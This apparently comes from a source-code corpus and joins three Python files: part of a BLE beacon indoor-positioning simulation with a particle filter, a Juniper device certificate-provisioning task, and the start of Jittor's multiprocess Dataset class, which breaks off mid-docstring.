allPosDistancesToBeacons[k,x,y]=np.linalg.norm(fingerPrintingBeaconPositions[k]- [x,y])
# INITIALIZE INTERPOLATION MAP FOR EACH RECEIVER
global interpolatedSignalStrenghForAllPositions_forEachReceiver
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y]=0
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
minDist=np.float('inf')
min_k=0
# find the closest beacon to [x,y]
for k in range(numberOfBeacons):
if allPosDistancesToBeacons[k,x,y] < minDist:
min_k=k
minDist = allPosDistancesToBeacons[k,x,y]
base_dist=np.linalg.norm(fingerPrintingBeaconPositions[min_k]-receiverPositions[i])
target_dist=allPosDistancesToReceivers[i,x,y]
base_RSSI=fingerPrintingSignalStrengthBeaconsToReceivers[i][min_k]
# whichever beacon or receiver is the closest to [x,y], it should determine the interpolation result
# yada receiver'lar daha yakin ise o noktalara 0 olarak vs. kalsin
# en sonra da buradaki tahmini degerleri hic bir blok yokmuscasina receiver versin
interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y]+=calc_relative_RSSI(base_dist,target_dist,base_RSSI)
print "calc_relative_RSSI is: " + str( calc_relative_RSSI(base_dist,target_dist,base_RSSI) )
print interpolatedSignalStrenghForAllPositions_forEachReceiver
def calc_relative_RSSI(base_dist, target_dist, base_RSSI):
print "calc_relative_RSSI: " + str( np.log ( (target_dist+safetyOffset) / (base_dist+safetyOffset) ) )
if target_dist >= 1:
return base_RSSI + -20 * np.log ( (target_dist) / (base_dist+safetyOffset) )
else:
return zero_one_meter_distance_to_RSSI(target_dist)
#distance in meters, returns RSSI in dBm
# assuming signal propogation constant is 2, https://www.rn.inf.tu-dresden.de/dargie/papers/icwcuca.pdf in equation (4)
# distance 4'den 8'e cikinca 0.6'dan 0.9'a cikiyor(negative ile carpildigi icin output), output daha az azalmis oluyro dist arttikca
# zero_one_meter_distance_to_RSSI'te ise mesela dist 0.1'den 0.2'ye ciksa sonuc 0.15'en 0.34'e cikiyor -> yani rssi daha hizli azalmis oluyor
def distance_to_RSSI(distance):
res_RSSI = 0
##print "distance is: " + str(distance)
if distance >=1:
res_RSSI = -20 * np.log10(distance) + rssiAtOne
else:
res_RSSI = zero_one_meter_distance_to_RSSI(distance)
return float(res_RSSI)
#RSSI in dBm, returns distance in meter
def RSSI_to_distance(RSSI):
res_distance = 0
if RSSI <= rssiAtOne:
res_distance = 10**( (RSSI-rssiAtOne) / -20 )
else:
res_distance = zero_one_meter_RSSI_to_distance(RSSI)
return float(res_distance)
# EXPONENTIAL FUNCITON BETWEEN 0 and 1
def zero_one_meter_RSSI_to_distance(RSSI):
#return float( np.log( (np.e - 1)/rssiAtOne * RSSI + 1 ) )
return 10**( ( ( RSSI - TX_Power ) * np.log10(2) ) / (rssiAtOne - TX_Power) ) -1
# should return something between TX power and rssiAtOne
def zero_one_meter_distance_to_RSSI (dist):
#return float( rssiAtOne * ( (np.exp(dist) - 1) / (np.e - 1) ) )
return float( TX_Power + (rssiAtOne - TX_Power) * ( (np.log10(dist+1)) / (np.log10(2) ) ) )
#float( (1-dist)*TX_Power + dist*rssiAtOne
# N_eff : Effective weight number
def neff(weights):
return 1.0 / np.sum(np.square(weights))
def getReceiverPositionsToInstall(xdims,ydims,numberOfReceivers):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
#reaOfTheMap=int( (ymax-ymin)*(xmax-xmin) )
step_size=(1/( np.ceil(np.sqrt(numberOfReceivers*1000) ) ) )
while True:
#initial_points=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax], size=(areaOfTheMap*2,2)) # I deleted .tolist()
#x_step_size=(xdims[1]-xdims[0])/3
#y_step_size=(ydims[1]-ydims[0])/3
#print "step_size is: " + str(step_size)
initial_points = np.mgrid[0:1+step_size:step_size, 0:1+step_size:step_size].reshape(2,-1).T
#print "initial_points are " + str(initial_points)
print "initial_points shape is: " + str(initial_points.shape)
receiverPositions = KMeans(n_clusters=numberOfReceivers, random_state=0,n_init=100).fit(initial_points).cluster_centers_
#receiverPositions=kmeans(initial_points,numberOfReceivers)
if receiverPositions is not None:
##print "initial receiver positions area " + str(receiverPositions)
receiverPositions[:,0]=xmin+receiverPositions[:,0]*(xmax-xmin)
receiverPositions[:,1]=ymin+receiverPositions[:,1]*(ymax-ymin)
##print "after receiverPositions are " + str(receiverPositions)
return receiverPositions
#return initial_points
def getBlockPositionsToInstall(xdims,ydims,numberOfBlocks):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
numberOfBlocksCreated=0
blockPositionsToInstall=[]
while numberOfBlocksCreated!=numberOfBlocks:
blockCoord=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax])
collisionExists=False
for receiverPosition in receiverPositions:
if checkRectangleRectangleIntersection(blockCoord,blockWidth,blockLength,receiverPosition,receiverWidth,receiverLength):
collisionExists=True
break
intersectionWithOtherBlocksExists=False
if not collisionExists: # if collision exists, do not make other checks
for blockPosition in blockPositionsToInstall:
if checkRectangleRectangleIntersection(blockCoord,blockWidth,blockLength,blockPosition,blockWidth,blockLength):
intersectionWithOtherBlocksExists=True
break
if not collisionExists and not intersectionWithOtherBlocksExists:
blockPositionsToInstall.append(blockCoord)
numberOfBlocksCreated+=1
#print numberOfBlocksCreated
return np.array(blockPositionsToInstall)
def getRoomPositionsToInstall(xdims,ydims,numberOfRooms,roomBoundary):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
numberOfRoomsCreated=0
roomPositionsToInstall=[]
while numberOfRoomsCreated!=numberOfRooms:
roomCoord=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax])
receiverHollowRoomCollisionExists=False
for receiverPosition in receiverPositions:
if not checkFirstRectangleContainsSecondRectangle(roomCoord,roomWidth,roomLength,receiverPosition,receiverWidth,receiverLength,boundaryForFirstRect=-roomBoundary) and \
checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,receiverPosition,receiverWidth,receiverLength,boundaryForFirstRect=roomBoundary):
receiverHollowRoomCollisionExists=True
break
intersectionWithBlocksExists=False
if not receiverHollowRoomCollisionExists:
for blockPosition in blockPositions:
if checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,blockPosition,blockWidth,blockLength,boundaryForFirstRect=roomBoundary):
intersectionWithBlocksExists=True
break
intersectionWithOtherRoomsExists=False
if not receiverHollowRoomCollisionExists and not intersectionWithBlocksExists:
for roomPosition in roomPositionsToInstall:
if checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,roomPosition,roomWidth,roomLength,boundaryForFirstRect=roomBoundary,boundaryForSecondRect=roomBoundary):
intersectionWithOtherRoomsExists=True
break
if not receiverHollowRoomCollisionExists and not intersectionWithBlocksExists and not intersectionWithOtherRoomsExists:
roomPositionsToInstall.append(roomCoord)
numberOfRoomsCreated+=1
#print numberOfRoomsCreated
return np.array(roomPositionsToInstall)
# main function
# strongSignalDistance -> to how many meters we accept this signal as strong. We use it for confidence ellipse calculations
# sensitivityOfResult -> how much sensitive we are about the final position of our object of interest
# maxSignalError -> signals are erronoues in real life, to simulate add noise upto this number
# minValidSignal -> min signal value we use for distance calculation
# minSignalValue -> min signal that we can still find, if a signal is lower than that(if receiver is far away), then this receiver(s) cannot catch this signal.
# movingLimit -> how many meters at a time our object moves at max
# movingTendency -> in what direction and meters our object tends to move
def cleanup(*args):
global currPersonNumber
plt.savefig(str("Person")+str(currPersonNumber)+".png", bbox_inches="tight")
exit()
def animate_dummy_init():
pass
def animate(iterNo, ax, macID, currPerson, NumberOfParticles, xdims=(0, 50), ydims=(0, 50), maxSignalError=20, movingLimit=2, pastCoeff=0, minValidSignal=-90,
minSignalValue=-100,numberOfReceivers=4, sensitivityOfResult=1.0, strongSignalDistance=5 , movingTendency=np.array([0,0]) ):
global currPersonNumber
signal(SIGTERM, cleanup)
ax.clear()
#print "iterNo is: " + str(iterNo)
#if iterNo == 0: # simdilik tek bir insan olsun
ax.set_xlim(*xdims)
ax.set_ylim(*ydims)
ax.set_aspect('equal',adjustable='box')
minSideLenghtOfTheMap=np.maximum(xdims[1]-xdims[0],ydims[1]-ydims[0])
tickStepSize=np.ceil(minSideLenghtOfTheMap/40)
xstart,xend = ax.get_xlim()
ystart,yend = ax.get_ylim()
ax.xaxis.set_ticks(np.arange(xstart, xend+tickStepSize, tickStepSize ))
ax.yaxis.set_ticks(np.arange(ystart, yend+tickStepSize, tickStepSize ))
ax.tick_params(axis="x", labelsize=20 * sizeIncrementRatio)
ax.tick_params(axis="y", labelsize=20 * sizeIncrementRatio)
start_time = time.time()
#print "linewidth_from_data_units"
roomLineWidth=linewidth_from_data_units(roomWallWidth,ax)
currPerson.move_beacon_in_map(xdims,ydims,movingLimit,movingTendency,roomBoundary=roomWallWidth/2)
#currPerson.beacon_pos = predefinedPos[iterNo]
#print "beacon pos is: " + str(currPerson.beacon_pos)
currPerson.calc_RSSIs_to_Receivers(minSignalValue,minValidSignal,maxSignalError )
currPerson.setBeaconDistances_fromRSSIs(minValidSignal)
global numberOfNotFounds
print iterNo
isProcessed=False
if all(dist is None for dist in currPerson.distToReceivers):
#print "all distances are None, no processing"
numberOfNotFounds+=1
pass
else:
currPerson.averaged_beacon_pos = currPerson.multiLateration(xdims,ydims,sensitivityOfResult)
print "real pos is: " + str(currPerson.beacon_pos)
print "multilateratiion pos is: " + str(currPerson.averaged_beacon_pos)
#print "averaged_beacon_pos for " + macID + " is: " + str(currPerson.averaged_beacon_pos)
#print "the real pos for " + macID + " is: " + str(currPerson.beacon_pos)
# 1st STEP
currPerson.predict_BLE(no_of_noise_elements = NumberOfParticles, movingLimit=movingLimit, pastCoeff = pastCoeff, xdims=xdims, ydims=ydims,movingTendency=movingTendency )
# 2nd STEP
currPerson.update_weights()
# resample if too few effective particles
if neff(currPerson.weights) < NumberOfParticles/2.0:
tmp_particles=np.zeros((NumberOfParticles, 2))
tmp_weights = np.zeros(NumberOfParticles)
tmp_particles[:]=currPerson.particles[:]
tmp_weights[:]=currPerson.weights[:]
currPerson.resample_from_higher_weights(tmp_particles, tmp_weights)
if np.allclose(tmp_weights, 1.0/NumberOfParticles):
currPerson.weights[:]=tmp_weights[:]
currPerson.particles[:]=tmp_particles[:]
else:
#print "no resampling is made for iteration " + iterNo
pass
currPerson.calc_PDF(strongSignalDistance,pastCoeff)
currPerson.prev_covMatrix=currPerson.covMatrix
currPerson.x_pp[:] = currPerson.x_prev[:] # or np.copyto(x_pp,x_prev)
currPerson.x_prev[:] = currPerson.particles[:] # or np.copyto(x_prev,particles)
global OverallError
CurrAccuracy = np.linalg.norm(currPerson.mu-currPerson.beacon_pos)
OverallError += CurrAccuracy
if iterNo == totalIterNo-1:
print "OverallError error is: " + str(OverallError)
print "average Error is: " + str(OverallError/(totalIterNo-numberOfNotFounds) )
print "numberOfNotFounds is: " + str(numberOfNotFounds)
##print "mean particle pos for " + macID + " is at " + str(currPerson.mu)
##print "max_weighted_particle pos for " + macID + " is at " + str(currPerson.max_weighted_particle)
##print "beacon for " + macID + " is at " + str(currPerson.beacon_pos)
##print "Final Accuracy is: " + str(CurrAccuracy) + " meter(s)"
##print "Final currPerson.covMatrix matrix is: " + str(currPerson.covMatrix)
# https://stackoverflow.com/questions/20126061/creating-a-confidence-ellipses-in-a-sccatterplot-using-matplotlib
particles_x,particles_y=np.hsplit(currPerson.particles,2)
if not np.isnan(currPerson.covMatrix).any() or \
not np.isinf(currPerson.covMatrix).any():
# Ellipse drawing code logic below is borrowed from Jaime's answer in https://stackoverflow.com/questions/20126061/creating-a-confidence-ellipses-in-a-sccatterplot-using-matplotlib/20127387
#The following code draws a one, two, and three standard deviation sized ellipses:
eigVals, eigVecs = np.linalg.eig(currPerson.covMatrix)
eigVals = np.sqrt(eigVals)
# larger eigenvalue should be the width and
# the angle is the ccw angle between the eigenvector of the corresponding eigenvalue and the positive x axis
color1,color2,color3=0.0,0.0,0.0 # color components for the hollow error ellipses
for j in range(1, 4):
ell = Ellipse(xy=(np.mean(particles_x),np.mean(particles_y)),
width=eigVals[np.argmax(abs(eigVals))]*j*2, height=eigVals[1-np.argmax(abs(eigVals))]*j*2,
angle=np.rad2deg(np.arctan2(*eigVecs[:,np.argmax(abs(eigVals))][::-1])))
color1+=0.3
color2+=0.2
color3+=0.25
#ell.set_facecolor((color1, color2, color3))
ell.set_edgecolor((color1, color2, color3))
ell.set_fill(False)
ell.set_linewidth(5.0)
ax.add_artist(ell)
else:
pass # do not draw any ellipses
# draw particles
ellipses = [Ellipse(xy=(xi,yi), width=particleWidth, height=particleHeight, linewidth=0, facecolor='black') for xi,yi in zip(currPerson.particles[:, 0],currPerson.particles[:, 1])]
c = collections.PatchCollection(ellipses)
ax.add_collection(c)
muPlot = Ellipse(xy=(currPerson.mu[0],currPerson.mu[1]), width=OOIWidth, height=OOIHeight, linewidth=0, facecolor='purple')
maxWeightedPlot = Ellipse(xy=(currPerson.max_weighted_particle[0],currPerson.max_weighted_particle[1]), width=OOIWidth, height=OOIHeight, linewidth=0, facecolor='orange')
ax.add_artist(muPlot)
ax.add_artist(maxWeightedPlot)
ax.text(0.3,1.03,s=r"\textbf{POI MACID = " + str(macID) + "}\n" + r"\textbf{Person" + str(currPersonNumber) + " / Time Step: " + str(iterNo) + "}\nCurrent Accuracy is: " + str(float("{0:.2f}".format(CurrAccuracy))) + "m"
, horizontalalignment='left' , verticalalignment='bottom' , fontsize=sizeIncrementRatio*13, transform=ax.transAxes )
isProcessed = True
# draw room, blocks and receivers in this way, since otherwise they do not appear in the map
if numberOfRooms > 0:
roomBottomLeft=roomPositions-np.array( [roomWidth/2,roomLength/2])
for roomIndex, roomPosition in enumerate(roomBottomLeft):
roomColor=materialColors[ roomMaterials[roomIndex] ]
ax.add_patch( Rectangle(roomPosition,roomWidth,roomLength,linewidth=roomLineWidth,edgecolor=roomColor,facecolor='None') ) # thich borders without face(inner size) makes a rectangle with a hole
if numberOfBlocks > 0:
blockBottomLeft=blockPositions-np.array( [blockWidth/2,blockLength/2])
for blockIndex, blockPosition in enumerate(blockBottomLeft):
blockColor=materialColors[ blockMaterials[blockIndex] ]
ax.add_patch( Rectangle(blockPosition,blockWidth,blockLength,linewidth=1,edgecolor=blockColor,facecolor=blockColor) )
if numberOfReceivers > 0:
receiverBottomLeft=receiverPositions-np.array( [receiverWidth/2,receiverLength/2])
for receiverPosition in receiverBottomLeft:
ax.add_patch( Rectangle(receiverPosition,receiverWidth,receiverLength,linewidth=1,edgecolor='darkblue',facecolor='darkblue') )
#elapsed_time = time.time() - start_time
#print "elapsed_time is: " + str(elapsed_time)
#time.sleep(1-elapsed_time)
beaconPosPlot = Ellipse((currPerson.beacon_pos[0],currPerson.beacon_pos[1]), width=OOIWidth, height=OOIHeight, linewidth=0, facecolor='green')
ax.add_artist(beaconPosPlot)
#plt.tight_layout(pad=4*(55.0/42.0))
plt.subplots_adjust(left=0,bottom=0.1,right=1,top=0.85,wspace=0,hspace=0)
if currPersonNumber == 1 and iterNo == 65:
os.kill(os.getpid(), SIGTERM)
elif currPersonNumber == 2 and iterNo == 59:
os.kill(os.getpid(), SIGTERM)
elif currPersonNumber == 3 and iterNo == 59:
os.kill(os.getpid(), SIGTERM)
elif currPersonNumber == 4 and iterNo == 43:
os.kill(os.getpid(), SIGTERM)
elif currPersonNumber == 5 and iterNo == 31:
os.kill(os.getpid(), SIGTERM)
if currPersonNumber == 6 and iterNo == 17:
os.kill(os.getpid(), SIGTERM)
#if isProcessed:
# ax.legend([beaconPosPlot, muPlot, maxWeightedPlot], ['BLE Beacon Pos', 'Mean Of Particles', 'Most Weighted Particle'], loc="lower left", prop={'size': (50.0/42.0)*10}, bbox_to_anchor=(0, 1))
#else:
# ax.legend([beaconPosPlot], ['BLE Beacon Pos'], loc="lower left", prop={'size': (50.0/42.0)*10}, bbox_to_anchor=(0, 1))
####################################################################################################################################################################################
if __name__ == '__main__':
main()
|
cert.py
|
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER
# Copyright (c) 2018 Juniper Networks, Inc.
# All rights reserved.
# Use is subject to license terms.
#
# Author: cklewar
import re
import threading
import time
from jnpr.junos.utils.scp import SCP
from ncclient.operations import RPCError, TimeoutExpiredError
import lib.constants as c
from lib.logmsg import LogCertTask as logmsg
from lib.logmsg import LogCommon
from lib.tasks.task import Task
from lib.tasks.tasktools import ChannelCancellation
from lib.tasks.tasktools import Configuration
from lib.tasks.tasktools import SSHPortForward
from lib.tools import Tools
class CertTask(Task):
CHECK_SCHEMA = True
TASK_TYPE = c.TASK_TYPE_PROVISION
TASK_VERSION = 1.0
def __init__(self, sample_device=None, shared=None):
super(CertTask, self).__init__(sample_device=sample_device, shared=shared)
self.logger.debug(Tools.create_log_msg(self.task_name, self.sample_device.deviceSerial,
LogCommon.IS_SUBCLASS.format(self.task_name,
issubclass(CertTask, Task))))
def pre_run_task(self):
pass
def run_task(self):
cancel_chan = ChannelCancellation()
e = threading.Event()
status, data = Tools.get_config(lookup_type=c.CONFIG_LOOKUP_TYPE_GET_DEVICE_CFG,
sample_device=self.sample_device)
if status:
if self.grp_cfg.TASKS.Provision.Cert.PortForwarding:
if self.sample_device.deviceServicePlugin != c.SERVICEPLUGIN_OSSH:
with SCP(self.sample_device.deviceConnection, progress=False) as scp:
scp.put(c.conf.SERVICES.Ossh.LocalConfigFile, c.SSHD_PORT_FWD_PATH)
self.logger.info(Tools.create_log_msg(self.task_name, self.sample_device.deviceSerial,
logmsg.CERT_FILE_OK.format(
self.sample_device.deviceSerial)))
self.sample_device.deviceConnection.close()
status, self.sample_device = Tools.create_dev_conn(self.sample_device)
if status:
thr = threading.Thread(target=self.do_cert_requests, args=(data, e, cancel_chan,))
thr.start()
ssh_pfwd = SSHPortForward(sample_device=self.sample_device, grp_cfg=self.grp_cfg, event=e,
cancel_chan=cancel_chan)
ssh_pfwd.init_port_fwd()
else:
return False, 'Error in device connection'
else:
thr = threading.Thread(target=self.do_cert_requests, args=(data, e, cancel_chan,))
thr.start()
ssh_pfwd = SSHPortForward(sample_device=self.sample_device, grp_cfg=self.grp_cfg, event=e,
cancel_chan=cancel_chan)
ssh_pfwd.init_port_fwd()
else:
self.do_cert_requests(datavars=data, event=None)
else:
self.logger.info(Tools.create_log_msg(self.task_name, self.sample_device.deviceSerial,
logmsg.CERT_DEV_DATA_NOK))
def do_cert_requests(self, datavars=None, event=None, cancel_chan=None):
# Do time sync before getting certs
req0 = 'set date ntp {0}'.format(datavars['device']['ntp_server'])
req1 = 'request security pki ca-certificate enroll ca-profile ' + datavars['device']['cert'][
'ca_profile']
req2 = 'request security pki ca-certificate verify ca-profile ' + datavars['device']['cert'][
'ca_profile']
req3 = 'request security pki generate-key-pair certificate-id ' + datavars['device']['hostname'] \
+ ' size 2048 type rsa'
req4 = 'request security pki local-certificate enroll ca-profile ' + datavars['device']['cert'][
'ca_profile'] \
+ ' certificate-id ' + datavars['device']['hostname'] + ' domain-name ' + \
datavars['device']['cert']['domain_name'] \
+ ' subject ' + datavars['device']['cert']['subject'] + ' challenge-password ' \
+ datavars['device']['cert']['challenge_password']
pattern = r'(error):\s.*'
regex = re.compile(pattern, re.MULTILINE)
if event is not None:
event.wait()
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS, task_state_message='Request Time Sync')
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD.format(req0))
resp = self.sample_device.deviceConnection.cli(command=req0, format='text', warning=False)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD_RESP.format(req0, resp))
try:
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS, task_state_message='Request CA Cert')
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD.format(req1))
resp = self.sample_device.deviceConnection.cli(command=req1, format='text', warning=False)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD_RESP.format(req1, resp))
status = re.findall(regex, resp)
if len(status) > 0 and status[0] == 'error':
self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=resp)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=resp)
return
else:
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS, task_state_message='Verify CA Cert')
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD.format(req2))
resp = self.sample_device.deviceConnection.cli(command=req2, format='text', warning=False)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD_RESP.format(req2, resp))
status = re.findall(regex, resp)
if len(status) > 0 and status[0] == 'error':
self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=status)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=status)
return
else:
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
task_state_message='Generate local keys')
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD.format(req3))
resp = self.sample_device.deviceConnection.cli(command=req3, format='text', warning=False)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD_RESP.format(req3, resp))
status = re.findall(regex, resp)
if len(status) > 0 and status[0] == 'error':
self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=status)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=status)
return
else:
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
task_state_message='Request local cert')
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD.format(req4))
resp = self.sample_device.deviceConnection.cli(command=req4, format='text', warning=False)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD_RESP.format(req4, resp))
status = re.findall(regex, resp)
if len(status) > 0 and status[0] == 'error':
self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=status)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=status)
return
else:
self.update_task_state(new_task_state=c.TASK_STATE_DONE,
task_state_message=c.TASK_STATE_MSG_DONE)
Tools.emit_log(task_name=self.task_name,
task_state={'taskState': self.task_state,
'taskStateMsg': c.TASK_STATE_MSG_DONE},
sample_device=self.sample_device, grp_cfg=self.grp_cfg,
shared=self.shared,
message=c.TASK_STATE_MSG_DONE,
scope=c.LOGGER_SCOPE_ALL, level=c.LOGGER_LEVEL_INFO)
time.sleep(5)
if cancel_chan is not None:
cancel_chan.cancel()
except (RPCError, TimeoutExpiredError) as err:
self.logger.info(Tools.create_log_msg(self.task_name, self.sample_device.deviceSerial,
logmsg.CERT_ISSUE_CMD_NOK.format(req0, err.message)))
self.sample_device.deviceTasks.taskState[self.task_name] = err.message
def post_run_task(self):
pass
|
dataset.py
|
# ***************************************************************
# Copyright (c) 2021 Jittor. All Rights Reserved.
# Maintainers:
# Meng-Hao Guo <guomenghao1997@gmail.com>
# Dun Liang <randonlang@gmail.com>.
#
# This file is subject to the terms and conditions defined in
# file 'LICENSE.txt', which is part of this source code package.
# ***************************************************************
import numpy as np
from urllib import request
import gzip
import pickle
import os
from jittor.dataset.utils import get_random_list, get_order_list, collate_batch, HookTimer
from collections.abc import Sequence, Mapping
import pathlib
from PIL import Image
import multiprocessing as mp
import signal
from jittor_utils import LOG
import jittor as jt
import time
dataset_root = os.path.join(pathlib.Path.home(), ".cache", "jittor", "dataset")
mp_log_v = os.environ.get("mp_log_v", 0)
mpi = jt.mpi
img_open_hook = HookTimer(Image, "open")
class Worker:
def __init__(self, target, args, buffer_size, keep_numpy_array=False):
self.buffer = jt.RingBuffer(buffer_size)
self.buffer.keep_numpy_array(keep_numpy_array)
self.status = mp.Array('f', 5, lock=False)
self.p = mp.Process(target=target, args=args+(self.buffer,self.status))
self.p.daemon = True
self.p.start()
class Dataset(object):
'''
Base class for reading data.
Args::
[in] batch_size(int): batch size, default 16.
[in] shuffle(bool): shuffle at each epoch, default False.
[in] drop_last(bool): if true, the last batch of dataset might smaller than batch_size, default True.
[in] num_workers(int): number of workers for loading data.
[in] buffer_size(int): buffer size for each worker in bytes, default(512MB).
Example::
class YourDataset(Dataset):
def __init__(self):
super().__init__()
self.set_attrs(total_len=1024)
def __getitem__(self, k):
return k, k*k
dataset = YourDataset().set_attrs(batch_size=256, shuffle=True)
for x, y in dataset:
......
'''
def __init__(self,
batch_size = 16,
shuffle = False,
drop_last = False,
num_workers = 0,
buffer_size = 512*1024*1024,
stop_grad = True,
keep_numpy_array = False):
super().__init__()
if os.environ.get("DISABLE_MULTIPROCESSING", '0') == '1':
num_workers = 0
self.total_len = None
self.batch_size = batch_size
self.shuffle = shuffle
self.drop_last = drop_last
self.num_workers = num_workers
self.buffer_size = buffer_size
self.stop_grad = stop_grad
self.keep_numpy_array = keep_numpy_array
self.sampler = None
def __getitem__(self, index):
raise NotImplementedError
def __batch_len__(self):
assert self.total_len >= 0
assert self.batch_size > 0
if self.drop_last:
return self.total_len // self.batch_size
return (self.total_len-1) // self.batch_size + 1
def __len__(self):
return self.__batch_len__()
def set_attrs(self, **kw):
'''
You can set attributes of dataset by using set_attrs function, including total_len, batch_size, shuffle, drop_last, num_workers, buffer_size.
Example::
dataset = YourDataset().set_attrs(batch_size=256, shuffle=True)
Attrs:
* batch_size(int): batch size, default 16.
* total_len(int): total lenght.
* shuffle(bool): shuffle at each epoch, default False.
* drop_last(bool): if true, the last batch of dataset might smaller than batch_size, default True.
* num_workers: number of workers for loading data
* buffer_size: buffer size for each worker in bytes, default(512MB).
* stop_grad: stop grad for data, default(True).
'''
for k,v in kw.items():
assert hasattr(self, k), k
setattr(self, k, v)
self.reset()
return self
def to_jittor(self, batch):
'''
Change batch data to jittor array, such as np.ndarray, int, and float.
'''
if self.keep_numpy_array: return batch
if isinstance(batch, jt.Var): return batch
to_jt = lambda x: jt.array(x).stop_grad() \
if self.stop_grad else jt.array(x)
if isinstance(batch, np.ndarray):
return to_jt(batch)
if not isinstance(batch, (list, tuple)):
return batch
new_batch = []
for a in batch:
if isinstance(a, np.ndarray) or \
isinstance(a, int) or \
isinstance(a, float):
new_batch.append(to_jt(a))
else:
new_batch.append(self.to_jittor(a))
return new_batch
def collate_batch(self, batch):
'''
Puts each data field into a tensor with outer dimension batch size.
Args::
[in] batch(list): A list of variables, such as jt.var, Image.Image, np.ndarray, int, float, str and so on.
'''
return collate_batch(batch)
def terminate(self):
'''
Terminate is used to terminate multi-process worker reading data.
'''
if hasattr(self, "workers"):
for w in self.workers:
w.p.terminate()
def _worker_main(self, worker_id, buffer, status):
import jittor_utils
jittor_utils.cc.init_subprocess()
jt.jt_init_subprocess()
seed = jt.get_seed()
wseed = (seed ^ worker_id) ^ 1234
jt.set_seed(wseed)
# parallel_op_compiler still problematic,
# it is not work on ubuntu 16.04. but worked on ubuntu 20.04
# it seems like the static value of parallel compiler
# is not correctly init.
jt.flags.use_parallel_op_compiler = 0
import time
try:
gid_obj = self.gid.get_obj()
gid_lock = self.gid.get_lock()
start = time.time()
while True:
# get id
with gid_lock:
while gid_obj.value >= self.batch_len or buffer.is_stop():
self.num_idle.value += 1
self.num_idle_c.notify()
self.gidc.wait()
self.num_idle.value -= 1
cid = gid_obj.value
self.idmap[cid] = worker_id
gid_obj.value += 1
self.gidc.notify()
now = time.time()
other_time = now - start
start = now
# load and transform data
batch = []
if mp_log_v:
print(f"#{worker_id} {os.getpid()} load batch", cid*self.real_batch_size, min(self.real_len, (cid+1)*self.real_batch_size))
for i in range(cid*self.real_batch_size, min(self.real_len, (cid+1)*self.real_batch_size)):
batch.append(self[self.index_list[i]])
batch = self.collate_batch(batch)
now = time.time()
data_time = now - start
start = now
# send data to main process
if mp_log_v:
print(f"#{worker_id} {os.getpid()} send", type(batch).__name__, [ type(b).__name__ for b in batch ], buffer)
try:
buffer.send(batch)
except:
if buffer.is_stop():
continue
raise
now = time.time()
send_time = now - start
start = now
status[0], status[1], status[2], status[3], status[4] = \
other_time, data_time, send_time, \
other_time + data_time + send_time, \
img_open_hook.duration
img_open_hook.duration = 0.0
except:
import traceback
line = traceback.format_exc()
print(line)
os.kill(os.getppid(), signal.SIGINT)
exit(0)
def display_worker_status(self):
''' Display dataset worker status, when dataset.num_workers > 0, it will display infomation blow:
.. code-block:: console
progress:479/5005
batch(s): 0.302 wait(s):0.000
recv(s): 0.069 to_jittor(s):0.021
recv_raw_call: 6720.0
last 10 workers: [6, 7, 3, 0, 2, 4, 7, 5, 6, 1]
ID wait(s) load(s) send(s) total
#0 0.000 1.340 2.026 3.366 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#1 0.000 1.451 3.607 5.058 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#2 0.000 1.278 1.235 2.513 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#3 0.000 1.426 1.927 3.353 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#4 0.000 1.452 1.074 2.526 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#5 0.000 1.422 3.204 4.625 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#6 0.000 1.445 1.953 3.398 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#7 0.000 1.582 0.507 2.090 Buffer(free=0.000% l=308283552 r=308283552 size=536870912)
Meaning of the outputs:
* progress: dataset loading progress (current/total)
* batch: batch time, exclude data loading time
* wait: time of main proc wait worker proc
* recv: time of recv batch data
